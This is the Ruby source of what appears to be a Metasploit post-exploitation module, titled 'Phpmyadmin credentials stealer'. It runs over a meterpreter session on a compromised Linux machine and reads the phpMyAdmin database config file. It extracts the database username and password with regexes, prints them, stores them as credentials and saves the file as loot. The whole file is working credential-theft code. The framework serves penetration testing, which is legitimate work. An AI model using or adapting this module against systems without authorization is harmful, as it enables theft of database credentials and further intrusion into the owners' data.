GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/phpmyadmin_credsteal.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Phpmyadmin credentials stealer',
        'Description' => %q{
          This module gathers Phpmyadmin creds from target linux machine.
        },
        'License' => MSF_LICENSE,
        'Platform' => ['linux'],
        'SessionTypes' => ['meterpreter'],
        'Author' => [
          'Chaitanya Haritash [bofheaded]',
          'Dhiraj Mishra <[email protected]>'
        ]
      )
    )
  end

  def parse_creds(contents)
    db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
    db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first

    unless db_user && db_pass
      print_error("Couldn't find PhpMyAdmin credentials")
      return
    end

    print_good("User: #{db_user}")
    print_good("Password: #{db_pass}")

    print_status('Storing credentials...')
    store_valid_credential(user: db_user, private: db_pass)
  end

  def run
    print_line("\nPhpMyAdmin Creds Stealer!\n")

    if session.platform.include?('windows')
      print_error('This module is not compatible with windows')
      return
    end

    conf_path = '/etc/phpmyadmin/config-db.php'
    unless file_exist?(conf_path)
      print_error("#{conf_path} doesn't exist on target")
      return
    end

    print_good('PhpMyAdmin config found!')
    res = read_file(conf_path)
    unless res
      print_error('You may not have permissions to read the file.')
      return
    end

    print_good('Extracting creds')
    parse_creds(res)

    p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
    print_good("Config file located at #{p}")
  end
end